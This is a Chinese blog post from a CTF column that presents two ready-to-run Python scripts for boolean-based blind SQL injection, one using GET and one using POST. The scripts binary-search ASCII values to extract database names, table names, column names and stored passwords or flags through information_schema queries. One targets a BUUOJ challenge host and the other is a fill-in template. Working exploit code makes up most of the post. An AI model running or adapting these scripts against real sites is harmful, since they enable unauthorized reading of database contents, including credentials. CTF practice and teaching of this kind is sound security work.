布尔盲注(SQL)

已于 2024-03-19 18:17:14 修改
阅读量488 收藏 7
点赞数 20
分类专栏: CTF 文章标签: web python sql
于 2024-03-13 20:21:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/The_Epiphany/article/details/136690001
版权

在网上看了各个师傅们的代码,结合写了一下,提高输出效率又尽可能的使代码简约

GET

import requests

url = "http://4f4e08ab-13d3-4d32-ab94-94955a536286.node5.buuoj.cn:81/search.php?id=0^"
res = ""
par = "?id=0^"
for i in range(160,250):
    print("第{0}个字符".format(i))
    begin = 33
    end = 130
    mid = (begin + end) >>1
    while begin < end:
    # 获取当前使用的数据库
        # payload = "(ascii(substr((select(database())),{0},1))>{1})".format(i,mid)
    # 获取当前数据库的所有表
        # payload = "(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{},1))>{})".format(i,mid)                                                                                                                                      
    # 获取表的字段
        # payload = "(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),{},1))>{})".format(i,mid)
    # 获取flag表的数据
        payload = "(ascii(substr((select(group_concat(password))from(F1naI1y)),{},1))>{})".format(i,mid)
        payload = url+payload
        response = requests.get(payload)
        if "NO" in response.text:
            begin = mid +1
        else:
            end = mid
        mid = (end + begin) >>1
    if chr(mid) =="!":
        break
    res += chr(mid)
    print(res)
print("结果:"+res)

POST型

其实大体上差不多只是改几个地方就好了

import requests
import time
 
rest = ""  # 要提前设置
url = "" #网址
payload = {"": ""} #参数记得加
par = '' #这是根据具体问题要加的前置条件
for i in range(1, 100):
    print('正在获取第 %d 个字符' % i)
    begin = 33
    end = 130
    middle = (begin+end) >> 1  # 记得加括号  结果就是对begin+end除以2取整数
    while begin < end:
        payload[""] = "{0}(ascii(substr((select(flag)from(flag)),{1},1))>{2})".format(par,i, middle)  # 别忘了参数
        resp = requests.post(url, data=payload)  # data传入的必须是一个字典
        if "Hello" in resp.text:
            begin = middle + 1
        else:
            end = middle
        middle = (begin + end) >> 1#重新对middle赋值
        time.sleep(0.001) #避免有时候报错可以注释掉
    if chr(middle) == "!":
        break
    rest += chr(middle)#返回值是当前对应的 ASCII 字符
    print("结果:" + rest)
print(rest)

感谢各位师傅

The_Epiphany
关注
  • 20
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlserver数据库布尔_SQL入之基于布尔详解
weixin_30623181的博客
12-24 1253
基于布尔Web的页面的仅仅会返回True和False。那么布尔就是进行SQL入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。由于本次是布尔入,手无法完整地进行脱裤。所以在本节需要编写大量的代码来帮助我们进行SQL入,得到数据。所以在这章里面会有很多的Python代码。本次的示例就是Less-8。通过进行下面的语句的入测试http://localhost...
SQL入之(布尔
Marsper的博客
09-23 872
SQL入之 SQL入之布尔入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL入。一般分为布尔和基于时间的和报错的。本次主要讲解的是基于布尔布尔型:页面只返回True和False两种类型页面。利用页面返回不同,逐个猜解数据 首先我们还是以sqli-labs为载体,第lesson 8。 输入 ?id='1' and 1= 2 -- 页面显示错误,可进行 首先认识几个函数: length()函数:返回字符串的长度 subst
SQL-实战布尔
dkxkl1314的博客
03-09 2567
环境:win10靶场:sqli-labs-master就是在SQL入过程中,SQL语句执行后,查询到的数据不能 回显到前端页面。此时,我们需要利用一些方法进行判断或者尝 试,这个过程称之为。而布尔就是SQL语句执行后,页面 不返回具体数据,数据库只返回0或者1(真or假)。类似于无法开口说话的人,只能通过点头和摇头来告诉你答案的正 确与否。在页面中,如果正确执行了用户构造的SQL语句,则返回一种页 面,如果 SQL语句执行错误,则执行另一种页面。
SQL布尔
陈艺秋的博客
01-19 458
布尔
SQL入之布尔
weixin_44029504的博客
04-16 966
布尔 --------------------------------------------------------------分隔符--------------------------------------------- 布尔原理 布尔是由于页面提交数据在与数据交互是完全没有在页面上出现回显数据,只会出现数据提交正确和错误俩种不同页面(报错型至少语法错误会回显错误在页面上)或...
布尔.py_sqlpython_
10-03
布尔(Boolean-Based Blind Injection)是SQL入攻击的一种类型,攻击者通过发送精心构造的查询,观察系统响应是否变化来判断数据库中的信息。在这个场景中,我们关的是一个名为"布尔.py"的Python脚本,...
SQL入之基于布尔详解
09-10
在基于布尔中,攻击者通常会尝试构造一系列的SQL查询,这些查询会在满足特定条件时改变原本的查询结果,从而导致网页返回不同的状态。例如,通过在URL中添加`id=2' and length(database())>1 %23`这样的参数,...
布尔python脚本.zip
12-28
布尔(Boolean-Based Blind Injection)是一种常见的SQL入攻击方式,它主要针对那些不返回完整查询结果或不显示任何错误信息的Web应用程序。在这种类型的入中,攻击者通过观察服务器响应时间或状态来判断SQL...
布尔python3范本模板
01-16
布尔python3范本模板
超级SQL入工具,支持布尔,报错,union入等
03-27
超级SQL入工具目前支持Bool型、错误显示入、Union入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
【持续集成_05课_Linux部署SonarQube及结合开发项目部署】
weixin_42333261的博客
07-12 165
前置条件:sonarQube不能使用root账号进行启动,所以需要创建普通用户及。3)CMD上传qube文件-不能传到home路径下哦。2)添加用户、组名、密码。4)检查并解压上传的包。
面试题 21:解释 Python 中的 help() 函数和 dir() 函数?
专注于全栈开发领域
07-10 781
在Python中,help()和dir()是两个非常有用的内置函数,它们可以帮助开发者更好地了解Python对象和模块。
Nginx七层(应用层)反向代理:UWSGI代理uwsgi_pass篇
jclee95的个人博客
07-10 1100
Nginx提供了多种应用层反向代理支持,包括proxy_pass、uwsgi_pass、fastcgi_pass和scgi_pass等。其中,proxy_pass指令可以接受一个URL参数,用于实现对HTTP/HTTPS协议的反向代理;uwsgi_pass用于代理到uWSGI应用服务器;fastcgi_pass用于代理到FastCGI服务器;而scgi_pass则用于代理到SCGI(Simple Common Gateway Interface)应用。这些指令使Nginx能够灵活地处理不同类型的后端服务和应
聊聊如何在内网下构建大模型微调环境
python1234567_的博客
07-12 833
LlamaFactory新版更新后,还是比较方便,只是说llamafactory-cli命令的确是有点蒙,踩个坑就好了。对于LlamaFactory微调来说,本身不难,毕竟都是配置;主要是在内网环境下的依赖包拉取安装是真麻烦,但其实也还好。走一遍的话,还是可以学到很多的。​。
leetcode--验证二叉搜索树
liulanba的博客
07-09 681
给你一个二叉树的根节点 root ,判断其是否是一个有效的二叉搜索树。有效 二叉搜索树定义如下:节点的左子树只包含 小于 当前节点的数。节点的右子树只包含 大于 当前节点的数。所有左子树和右子树自身必须也是二叉搜索树。示例 1:输入:root = [2,1,3]输出:true示例 2:输入:root = [5,1,4,null,null,3,6]输出:false解释:根节点的值是 5 ,但是右子节点的值是 4。提示:树中节点数目范围在[1, 104] 内。
MySQL空间索引
你的指尖有改变世界的力量
07-10 283
空间类型是建立在空间类型字段上的。
CV06_Canny边缘检测算法和python实现
https://github.com/foxpup11?tab=repositories
07-11 857
https://www.bilibili.com/video/BV1qU4y1U7aK/?spm_id_from=333.337.search-card.all.click&vd_source=7dace3632125a1ef7fd32c285eb2fbac
一键安装ros及出现问题的解决方案
m0_58173801的博客
07-10 584
catkin_make时出现报错如下。
sklearn基础教程:掌握机器学习入门的钥匙
最新发布
AIGC绘图领域探索者,热衷于将创意与技术融合,致力于分享前沿AI绘图技巧与心得,让我们一起开启视觉艺术的新篇章。
07-13 763
是基于Python的一个开源机器学习库,它建立在NumPy、SciPy和matplotlib之上,提供了大量的算法和工具,用于数据挖掘和数据分析。无论是简单的线性回归,还是复杂的神经网络,sklearn都能提供直观易用的接口。作为Python中最为流行的机器学习库之一,以其简洁的API、丰富的算法和强大的功能赢得了广大用户的青睐。通过本文的介绍,相信你已经对sklearn有了初步的了解,并能够开始进行一些基础的机器学习任务。
墨者靶场sql布尔
10-09
针对墨者靶场的 SQL 布尔,你需要先了解 SQL 入的基本概念和实现方式。在进行布尔时,需要通过构造特定的 SQL 语句来判断数据库中是否存在某些数据或条件,从而实现入攻击。以下是一些可能用到的入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值